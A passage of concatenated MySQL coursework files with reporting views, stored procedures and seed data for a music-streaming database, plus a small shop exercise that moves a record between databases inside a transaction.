  RIGHT JOIN artists AS art ON perf.artist_id = art.id
  LEFT JOIN songs AS sng ON perf.song_id = sng.id
  LEFT JOIN albums AS alb ON sng.album_id = alb.id;
SELECT * FROM allsongalbumartist;
--
-- Most-streamed songs.
create or replace view moststreamedsongs(song_id, countofstreams) as
select song_id, count(*) as countofstreams from streams group by song_id order by countofstreams desc;
-- Report: stream counts with song, album and artist names.
-- NOTE(review): a song with several performers yields one row per performer here.
select mss.countofstreams , s.songname, a.albumname, ar.artistsname
from moststreamedsongs as mss
left join songs as s
on mss.song_id = s.id
left join songperformers as sp
on mss.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id;
-- Most-streamed albums.
create or replace view moststreamedalbums(album_id, countofstreams) as
select album_id, count(*) as countofstreams from streams group by album_id order by countofstreams desc;
-- Report: album stream counts with album and artist names
-- (joins through artistsandalbums, defined elsewhere in the schema).
select msa.countofstreams , a.albumname, ar.artistsname
from moststreamedalbums as msa
left join albums as a
on msa.album_id = a.id
left join artistsandalbums as aa
on msa.album_id = aa.album_id
left join artists as ar
on aa.artist_id = ar.id;
-- Most-liked songs (the original comment said "playlists", but this view ranks songs)
-- View: songs ranked by like count; followed by a top-10 report with album/artist.
CREATE OR REPLACE VIEW likedsongsview(song_id, countoflikes) AS
SELECT song_id, COUNT(*) AS countoflikes
  FROM likedsongs
 WHERE likedornot = '1'
 GROUP BY song_id
 ORDER BY countoflikes DESC;
SELECT ranked.countoflikes, sng.songname, alb.albumname, art.artistsname
  FROM likedsongsview AS ranked
  LEFT JOIN songperformers AS perf ON ranked.song_id = perf.song_id
  LEFT JOIN artists AS art ON perf.artist_id = art.id
  LEFT JOIN songs AS sng ON perf.song_id = sng.id
  LEFT JOIN albums AS alb ON sng.album_id = alb.id
 LIMIT 10;
-- Most popular artists by subscriber count (top 10).
select ar.artistsname, subscribes.artist_id, count(*) as countofsubscribers from subscribes
left join artists as ar
on subscribes.artist_id = ar.id
where subscribedornot = '1' group by artist_id order by countofsubscribers desc limit 10;
-- Most popular playlists by like count (top 10), with the creator's login.
select p.playlistname, p.description, u.loginname as creator, likedplaylists.playlist_id, count(*) as countoflikes from likedplaylists
left join playlists as p
on likedplaylists.playlist_id = p.id
left join users as u
on p.created_by = u.id
where likedornot = '1' group by playlist_id order by countoflikes desc limit 10;
-- Genre selection: all songs tagged 'Post-punk', with album and artist.
select s.genre, s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk';
-- Most-liked songs in the Post-punk genre (top 10).
-- NOTE(review): this re-creates likedsongsview with the same definition it already
-- has earlier in this file — the CREATE OR REPLACE here is redundant.
create or replace view likedsongsview(song_id, countoflikes) as
select song_id, count(*) as countoflikes from likedsongs where likedornot = '1'
group by song_id order by countoflikes desc;
select lsv.countoflikes, s.genre, s.songname, a.albumname, ar.artistsname
from likedsongsview as lsv
left join songperformers as sp
on lsv.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk' limit 10;
-- Most-streamed songs in the Post-punk genre (top 10).
-- NOTE(review): re-creates moststreamedsongs with the same definition it already
-- has earlier in this file — the CREATE OR REPLACE here is redundant.
create or replace view moststreamedsongs(song_id, countofstreams) as
select song_id, count(*) as countofstreams from streams group by song_id order by countofstreams desc;
select mss.countofstreams, s.genre, s.songname, a.albumname, ar.artistsname
from moststreamedsongs as mss
left join songs as s
on mss.song_id = s.id
left join songperformers as sp
on mss.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk' limit 10;
-- New releases: 20 most recent songs by album release year.
select s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname, a.yearofrelease
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
order by a.yearofrelease desc limit 20;
-- Procedure: list the artists a given user is currently subscribed to.
DROP PROCEDURE IF EXISTS usersubscribeinfo;
DELIMITER //
CREATE PROCEDURE usersubscribeinfo(IN for_user_id INT)
BEGIN
    SELECT u.id AS user_id,
           subscribes.artist_id,
           artists.artistsname,
           u.loginname
      FROM subscribes
      LEFT JOIN users AS u ON subscribes.users_id = u.id
      LEFT JOIN artists ON subscribes.artist_id = artists.id
     WHERE subscribedornot = '1' AND u.id = for_user_id;
END//
DELIMITER ;
CALL usersubscribeinfo(200);
-- Procedure: show a given user's listening history (streams) with
-- song, album and artist names resolved.
drop procedure if exists userstreamsinfo;
delimiter //
create procedure userstreamsinfo(in for_user_id int)
begin
select u.id, u.loginname, str.song_id, s.songname, a.albumname, ar.artistsname
from streams as str
left join users as u
on str.users_id = u.id
left join songs as s
on str.song_id = s.id
left join songperformers as sp
on str.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id
where u.id = for_user_id;
end//
delimiter ;
-- Example invocation for user id 8.
call userstreamsinfo(8);
-- Procedure: list a given user's liked songs together with their genres.
DROP PROCEDURE IF EXISTS userfavoritesongsinfo;
DELIMITER //
CREATE PROCEDURE userfavoritesongsinfo(IN for_user_id INT)
BEGIN
    SELECT u.id AS user_id,
           ls.song_id,
           s.songname,
           s.genre,
           u.loginname
      FROM likedsongs AS ls
      LEFT JOIN users AS u ON ls.users_id = u.id
      LEFT JOIN songs AS s ON ls.song_id = s.id
     WHERE likedornot = '1' AND u.id = for_user_id;
END//
DELIMITER ;
call userfavoritesongsinfo(232);<file_sep>use shop;
-- Seed data for shop.categories (generated sample rows with explicit ids).
show TABLES;
insert into categories (id, name, description) values (1, 'Ibex', 'Capra ibex');
insert into categories (id, name, description) values (2, 'Ox, musk', 'Ovibos moschatus');
insert into categories (id, name, description) values (3, 'Turtle (unidentified)', 'unavailable');
insert into categories (id, name, description) values (4, 'Gonolek, burchell''s', 'Laniaurius atrococcineus');
insert into categories (id, name, description) values (5, 'Phascogale, red-tailed', 'Phascogale calura');
insert into categories (id, name, description) values (6, 'Goose, greylag', 'Anser anser');
insert into categories (id, name, description) values (7, 'Fox, savanna', 'Dusicyon thous');
insert into categories (id, name, description) values (8, 'Lion, mountain', 'Felis concolor');
insert into categories (id, name, description) values (9, 'Crowned hawk-eagle', 'Spizaetus coronatus');
insert into categories (id, name, description) values (10, 'Bird, bare-faced go away', 'Lorythaixoides concolor');
insert into categories (id, name, description) values (11, 'Eurasian red squirrel', 'Sciurus vulgaris');
insert into categories (id, name, description) values (12, 'Ibis, puna', 'Plegadis ridgwayi');
insert into categories (id, name, description) values (13, 'Burmese brown mountain tortoise', 'Manouria emys');
insert into categories (id, name, description) values (14, 'Common zorro', 'Dusicyon thous');
insert into categories (id, name, description) values (15, 'Dabchick', 'Tachybaptus ruficollis');
insert into categories (id, name, description) values (16, 'Ibex', 'Capra ibex');
insert into categories (id, name, description) values (17, 'Moose', 'Alces alces');
insert into categories (id, name, description) values (18, 'Alpaca', 'Lama pacos');
insert into categories (id, name, description) values (19, 'Arctic hare', 'Lepus arcticus');
insert into categories (id, name, description) values (20, 'Three-banded plover', 'Charadrius tricollaris');
insert into categories (id, name, description) values (21, 'Marshbird, brown and yellow', 'Pseudoleistes virescens');
insert into categories (id, name, description) values (22, 'Tyrant flycatcher', 'Myiarchus tuberculifer');
-- 1. В базе данных shop и sample присутствуют одни и те же таблицы, учебной базы данных.
-- Переместите запись id = 1 из таблицы shop.users в таблицу sample.users. Используйте транзакции.
-- (PS буду использовать другие таблицы, т.к. они уже были созданы на одном из вебинаров и сути задания не поменяют)
-- Set up the sample database by cloning the shop tables.
-- NOTE(review): CREATE TABLE ... AS SELECT copies data but not keys/constraints,
-- hence the ALTER below to restore the auto-increment primary key.
create database if not exists sample;
use sample;
create table if not exists sample.categories AS SELECT * FROM shop.categories;
create table if not exists sample.goods AS SELECT * FROM shop.goods;
create table if not exists sample.orders AS SELECT * FROM shop.orders;
create table if not exists sample.orders_has_goods AS SELECT * FROM shop.orders_has_goods;
-- Clear the copied rows and re-seed sample.categories with its own data.
truncate table categories;
ALTER TABLE sample.categories MODIFY COLUMN id int auto_increment NOT null PRIMARY KEY;
insert into categories (name, description) values ('Painted stork', 'Mycteria leucocephala');
insert into categories (name, description) values ('Paca', 'Agouti paca');
insert into categories (name, description) values ('Chickadee, black-capped', 'Parus atricapillus');
insert into categories (name, description) values ('Common mynah', 'Acridotheres tristis');
insert into categories (name, description) values ('Elk, Wapiti', 'Cervus canadensis');
insert into categories (name, description) values ('Galapagos sea lion', 'Zalophus californicus');
insert into categories (name, description) values ('Albatross, galapagos', 'Diomedea irrorata');
insert into categories (name, description) values ('Starling, superb', 'Lamprotornis superbus');
insert into categories (name, description) values ('Lapwing (unidentified)', 'Vanellus sp.');
insert into categories (name, description) values ('Porcupine, crested', 'Hystrix cristata');
-- Move (not merely copy) record id = 1 from shop.categories into sample.categories.
-- BUG FIX: the task asks to *move* the record, so the insert into sample and the
-- delete from shop must succeed or fail together — hence the single transaction.
start transaction;
insert into sample.categories (name, description)
select name, description from shop.categories where shop.categories.id = 1;
delete from shop.categories where id = 1;
commit;
-- Task: create a view exposing each product's name from goods (products) together
-- with its category name from categories (catalogs).
use shop;
-- Sample row to exercise the view join.
insert into goods (name, description, quantity, price, categories_id)
values ('dfghj', 'lalalalala', 8, 100500, 13);
CREATE OR REPLACE VIEW goodswithcategories(id, name, description, categories_name) as
SELECT
-- FIX: the alias was `categories_id`, contradicting the view column `categories_name`;
-- output is unchanged (the view column list governs) but the alias now matches.
g.id, g.name, g.description, c.name as categories_name
FROM goods as g
left join categories as c
on g.categories_id = c.id;
select * from goodswithcategories;
-- Seed data: artists. Each row supplies a display name, an image_id
-- (presumably an FK into an images table — not visible here, verify against
-- the schema), and a free-text description. The `<NAME>` tokens are
-- anonymization placeholders left by the data generator.
<file_sep>insert into artists (artistsname, image_id, description) values ('<NAME>', 1, 'The Rolling Stones are an English rock band formed in London in 1962.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 2, '<NAME> was an American guitarist, singer and songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 3, '<NAME> was a psychedelic rock band from San Francisco. They were formed in 1965.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 4, 'The Beatles were an English rock band, started in Liverpool, England in 1960. The members of the band were <NAME>, <NAME>, <NAME>, and <NAME>.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 5, 'Led Zeppelin were an English rock band. The members were <NAME> (vocals), <NAME> (lead guitar), <NAME> (bass), and <NAME> (drums). ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 6, 'Fleetwood Mac are a British-American rock band that formed in London, England in 1967.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 7, '<NAME> was an American singer, musician and actor. He is often regarded as the most influential and most famous musician of the 20th century, and is widely regarded as a cultural icon.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 8, '<NAME> is an American rock band formed in 1990 in Seattle, Washington. The bands lineup consists of founding members <NAME> (bass guitar), <NAME> (rhythm guitar), <NAME> (lead guitar), and <NAME>der (lead vocals, guitar), as well as <NAME> (drums)');
insert into artists (artistsname, image_id, description) values ('The Beach Boys', 9, 'The Beach Boys are an American rock band formed in Hawthorne, California in 1961. The groups original lineup consisted of brothers Brian, Dennis, and <NAME>, their cousin <NAME>, and friend <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 10, '<NAME> (born <NAME>, May 24, 1941) is an American singer-songwriter, author and visual artist. Widely regarded as one of the greatest songwriters of all time, Dylan has been a major figure in popular culture for more than 50 years.');
insert into artists (artistsname, image_id, description) values ('<NAME> and the Heartbreakers', 11, '<NAME> and the Heartbreakers was an American rock band from Gainesville, Florida. Formed in 1976, the band originally comprised <NAME> (lead singer, guitar), <NAME> (lead guitarist), <NAME> (bass guitar), <NAME> (drums), and <NAME> (keyboards). ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 12, '<NAME> (born <NAME>; February 26, 1932 – September 12, 2003) was an American singer, songwriter, musician, and actor.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 13, '<NAME> (September 23, 1930 – June 10, 2004) was an American singer, songwriter, pianist, and composer.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 14, '<NAME> (8 January 1947 – 10 January 2016), known professionally as <NAME>, was an English singer-songwriter and actor. He was a leading figure in the music industry and is regarded as one of the most influential musicians of the 20th century. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 15, '<NAME> (n? Judkins; born May 13, 1950), known professionally as <NAME>, is an American singer, songwriter, musician and record producer. A prominent figure in popular music during the second half of the 20th century, Wonder is one of the most successful songwriters and musicians. ');
insert into artists (artistsname, image_id, description) values ('Prince', 16, '<NAME> (June 7, 1958 – April 21, 2016) was an American singer-songwriter, musician, record producer, dancer, and actor. He is widely regarded as one of the greatest musicians of his generation.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 17, '<NAME>, OM (6 February 1945 – 11 May 1981) was a Jamaican singer, songwriter, and musician. Considered one of the pioneers of reggae, his musical career was marked by fusing elements of reggae, ska, and rocksteady, as well as his distinctive vocal and songwriting style.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 18, '<NAME> (March 25, 1942 – August 16, 2018) was an American singer, songwriter, actress, pianist, and civil rights activist.');
insert into artists (artistsname, image_id, description) values ('The Who', 19, 'The Who are an English rock band formed in London in 1964. Their classic lineup consisted of lead singer <NAME>, guitarist and singer <NAME>, bass guitarist and singer <NAME>, and drummer <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 20, '<NAME> (October 18, 1926 – March 18, 2017) was an American singer, songwriter and guitarist, and one of the pioneers of rock and roll music.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 21, '<NAME>, CBE (born 30 March 1945) is an English rock and blues guitarist, singer, and songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 22, '<NAME> were an American folk-rock duo consisting of singer-songwriter <NAME> and singer <NAME>. One of the best-selling music groups of the 1960s');
insert into artists (artistsname, image_id, description) values ('The Velvet Underground', 23, 'The Velvet Underground was an American rock band formed in New York City in 1964 by singer/guitarist Lou Reed, multi-instrumentalist <NAME>, guitarist <NAME>, and drummer <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 24, '<NAME> (August 29, 1958 – June 25, 2009) was an American singer, songwriter, and dancer. Dubbed the "King of Pop", he is regarded as one of the most significant cultural figures of the 20th century. Through stage and video performances, he popularized complicated dance techniques such as the moonwalk, to which he gave the name, and the robot.');
insert into artists (artistsname, image_id, description) values ('The Black Angels', 25, 'The Black Angels are an American psychedelic rock band from Austin, Texas.');
insert into artists (artistsname, image_id, description) values ('The Doors', 26, 'The Doors were an American rock band formed in Los Angeles in 1965, with vocalist <NAME>, keyboardist <NAME>, guitarist <NAME>, and drummer <NAME>. ');
insert into artists (artistsname, image_id, description) values ('Joy Division', 27, 'Joy Division were an English rock band formed in Salford in 1976. The group consisted of vocalist <NAME>, guitarist/keyboardist <NAME>, bassist <NAME> and drummer <NAME>.');
insert into artists (artistsname, image_id, description) values ('Fontaines D.C.', 28, 'Fontaines D.C. are an Irish post-punk revival band formed in Dublin in 2017.The band consists of <NAME> (vocals), <NAME> (guitar), <NAME> (guitar), <NAME> III (bass), and <NAME> (drums).');
insert into artists (artistsname, image_id, description) values ('<NAME>', 29, '<NAME> (January 19, 1943 – October 4, 1970) was an American singer-songwriter who sang rock, soul and blues music. One of the most successful and widely known rock stars of her era, she was noted for her powerful mezzo-soprano vocals and "electric" stage presence.');
insert into artists (artistsname, image_id, description) values ('Kyuss', 30, 'Kyuss was an American rock band, formed in Palm Desert, California in 1987. The band disbanded in 1995, and since then, members of Kyuss have gone on to form or play in several notable bands including Queens of the Stone Age, Fu Manchu, Dwarves, Eagles of Death Metal, Mondo Generator, Hermano, Unida, Slo Burn and Them Crooked Vultures.');
insert into artists (artistsname, image_id, description) values ('Queens of the Stone Age', 31, 'Queens of the Stone Age (commonly abbreviated QOTSA) is an American rock band formed in 1996 in Palm Desert, California. The band was founded by vocalist and guitarist <NAME>, who has been the only constant member throughout multiple line-up changes. The current line-up consists of Homme alongside <NAME> (guitar, lap steel, keyboard, percussion, backing vocals), <NAME> (bass guitar, keyboard, backing vocals), <NAME> (keyboards, guitar, percussion, backing vocals), and <NAME> (drums, percussion).');
insert into artists (artistsname, image_id, description) values ('Metallica', 32, 'Metallica is an American heavy metal band. The band was formed in 1981 in Los Angeles by vocalist/guitarist <NAME> and drummer Lars Ulrich, and has been based in San Francisco for most of its career.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 33, '<NAME> (14 September 1983 – 23 July 2011) was an English singer and songwriter. She was known for her deep, expressive contralto vocals and her eclectic mix of musical genres, including soul, rhythm and blues and jazz.');
insert into artists (artistsname, image_id, description) values ('Heart', 34, 'Heart is an American rock band formed in 1970 in Seattle, Washington, by <NAME> (bass guitar), <NAME> (guitar), <NAME> (keyboards), and <NAME> (drums). It evolved from an existing band, White Heart. The vocalists for Heart are sisters <NAME> (lead vocals, flute, guitar) and <NAME> (vocals, guitar, mandolin).');
insert into artists (artistsname, image_id, description) values ('The Cranberries', 35, 'The Cranberries were an Irish rock band formed in Limerick, Ireland, in 1989 by lead singer <NAME>, guitarist <NAME>, bassist <NAME>, and drummer <NAME>. Quinn was replaced as lead singer by <NAME> in 1990. The band officially classified themselves as an alternative rock group, but incorporated aspects of indie pop, post-punk, folk rock, and pop rock into their sound.');
insert into artists (artistsname, image_id, description) values ('Adele', 36, '<NAME> MBE (born 5 May 1988), is an English singer-songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 37, '<NAME> (born January 25, 1981), known professionally as <NAME>, is an American singer-songwriter. A classically-trained pianist, Keys began composing songs by age 12 and was signed at 15 years old by Columbia Records. ');
insert into artists (artistsname, image_id, description) values ('Evanescence', 38, 'Evanescence is an American rock band founded in Little Rock, Arkansas, in 1995 by singer and pianist <NAME> and guitarist <NAME>. After recording independent albums, the band released their first full-length album, Fallen, on Wind-up Records in 2003.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 39, '<NAME> (born June 21, 1985), known by her stage name <NAME>, is an American singer-songwriter. Her music is noted for its stylized, cinematic quality; themes of sadness, tragic romance, glamor, and melancholia; and references to pop culture, particularly 1950s and 1960s Americana.');
insert into artists (artistsname, image_id, description) values ('Blondie', 40, 'Blondie is an American rock band co-founded by singer <NAME> and guitarist <NAME>. The band were pioneers in the American punk and then the new wave scene of the mid-1970s in New York. ');
-- Seed data: albums. coverimage URLs are robohash.org placeholders from the
-- data generator. NOTE(review): genre is stored here AND per-song in the
-- songs table below — the data is denormalized; confirm this is intentional.
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Unknown Pleasures', 'https://robohash.org/temporeinventoreincidunt.bmp?size=50x50&set=set1', 1979, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Closer', 'https://robohash.org/optionemoaut.bmp?size=50x50&set=set1', 1980, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('A Hero\'s Death', 'https://robohash.org/reiciendissolutasuscipit.bmp?size=50x50&set=set1', 2020, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Dogrel', 'https://robohash.org/totammollitiaexplicabo.png?size=50x50&set=set1', 2019, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Pearl', 'https://robohash.org/dolorlaborumest.bmp?size=50x50&set=set1', 1971, 'Blues rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Welcome to Sky Valley', 'https://robohash.org/adharumpossimus.png?size=50x50&set=set1', 1994, 'Stoner rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Metallica', 'https://robohash.org/hicitaquein.jpg?size=50x50&set=set1', 1991, 'Heavy metal');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Back to Black', 'https://robohash.org/consequunturmagnamquaerat.bmp?size=50x50&set=set1', 2006, 'Soul/R&B');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('21', 'https://robohash.org/occaecatiquiavoluptas.jpg?size=50x50&set=set1', 2011, 'Soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('25', 'https://robohash.org/estsitut.jpg?size=50x50&set=set1', 2015, 'Soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Born to Die', 'https://robohash.org/necessitatibusnobismodi.png?size=50x50&set=set1', 2012, 'Alternative pop');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Songs in A Minor', 'https://robohash.org/consequaturquidemdeleniti.png?size=50x50&set=set1', 2001, 'Neo soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('The Doors', 'https://robohash.org/animisintiste.bmp?size=50x50&set=set1', 1967, 'Rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Strange Days', 'https://robohash.org/sedreprehenderitsed.bmp?size=50x50&set=set1', 1967, 'Psychedelic rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Waiting for the Sun', 'https://robohash.org/laudantiumsedofficia.bmp?size=50x50&set=set1', 1968, 'Rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Morrison Hotel', 'https://robohash.org/quasidignissimosodio.bmp?size=50x50&set=set1', 1970, 'Psychedelic rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('The Diary of Alicia Keys', 'https://robohash.org/autaccusamuset.jpg?size=50x50&set=set1', 2003, 'Soul/R&B');
-- Seed data: songs. album_id references the albums inserted above (1 =
-- Unknown Pleasures, 9 = 21, 3 = A Hero's Death, 6 = Welcome to Sky Valley,
-- 5 = Pearl, 13 = The Doors — assuming ids were assigned in insert order;
-- verify against the table). songduration values are 'm:ss' strings, and
-- songfile names are generator placeholders with arbitrary extensions.
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Dead Souls', 1, 1, '4:25','Elit.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The Only Mistake', 1, 2, '4:12','QuamFringilla.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Insight', 1, 3, '3:52','SociisNatoquePenatibus.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Candidate', 1, 4, '2:08','Ultrices.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Wilderness', 1, 5, '2:32','MassaVolutpatConvallis.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('She\'s Lost Control', 1, 6, '3:35','Eleifend.mpeg', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Shadowplay', 1, 7, '3:29','NullaElitAc.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Disorder', 1, 8, '3:29','Maecenas.png', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Interzone', 1, 9, '2:05','Eleifend.txt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Atrocity Exhibition', 1, 10, '6:14','VestibulumQuam.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Novelty', 1, 11, '4:28','ParturientMontesNascetur.tiff', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Transmission', 1, 12, '3:50','Pellentesque.doc', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Rolling in the Deep', 9, 1, '3:49','Amet.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Rumour Has It', 9, 2, '3:43','ImperdietNullamOrci.txt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Turning Tables', 9, 3, '4:10','RutrumNeque.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Don\'t You Remember', 9, 4, '4:03','Libero.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Set Fire to the Rain', 9, 5, '4:01','VelitVivamus.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('He Won\'t Go', 9, 6, '4:37','InPorttitorPede.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Take It All', 9, 7, '3:48','Donec.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I\'ll Be Waiting', 9, 8, '4:01','AmetSapien.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('One and Only', 9, 9, '5:48','Lectus.avi', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Lovesong', 9, 10, '5:16','LuctusTinciduntNulla.doc', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Someone like You', 9, 11, '4:45','TortorId.mp3', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Don\'t Belong', 3, 1, '4:31','Congue.png', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Love Is the Main Thing', 3, 2, '3:53','Erat.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Televised Mind', 3, 3, '4:10','MetusAeneanFermentum.jpeg', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Lucid Dream', 3, 4, '3:53','AliquamAugue.pdf', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('You Said', 3, 5, '4:36','CondimentumNeque.doc', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Oh, Such a Spring', 3, 6, '2:32','Mauris.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Hero\'s Death', 3, 7, '4:18','Aliquet.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Living in America', 3, 8, '4:56', 'PretiumNislUt.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Was Not Born', 3, 9, '3:50', 'FaucibusOrciLuctus.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Sunny', 3, 10, '4:52', 'Potenti.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('No', 3, 11, '5:08', 'Eros.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Gardenia', 6, 1, '6:54', 'ElitAcNulla.doc', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Asteroid', 6, 2, '4:49', 'NisiEu.ppt', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Supa Scoopa and Mighty Scoop', 6, 3, '6:04', 'SemperInterdumMauris.xls', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('100°', 6, 4, '2:29', 'Purus.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Space Cadet', 6, 5, '7:02', 'NullaDapibusDolor.gif', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Demon Cleaner', 6, 6, '5:19', 'Tristique.avi', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Odyssey', 6, 7, '4:19', 'Quisque.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('<NAME>', 6, 8, '2:12', 'LacusMorbiSem.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('N.O', 6, 9, '3:47', 'Erat.xls', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Whitewater', 6, 10, '8:00', 'Nulla.avi', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Move Over', 5, 1, '3:39', 'Dolor.png', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Cry Baby', 5, 2, '3:55', 'SapienPlacerat.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Woman Left Lonely', 5, 3, '3:27', 'Odio.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Half Moon', 5, 4, '3:51', 'SedSagittis.jpeg', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Buried Alive in the Blues', 5, 5, '2:24', 'Varius.xls', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('My Baby', 5, 6, '3:44', 'Vel.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Me and <NAME>', 5, 7, '4:29', 'IdPretium.avi', 'Blues rock');
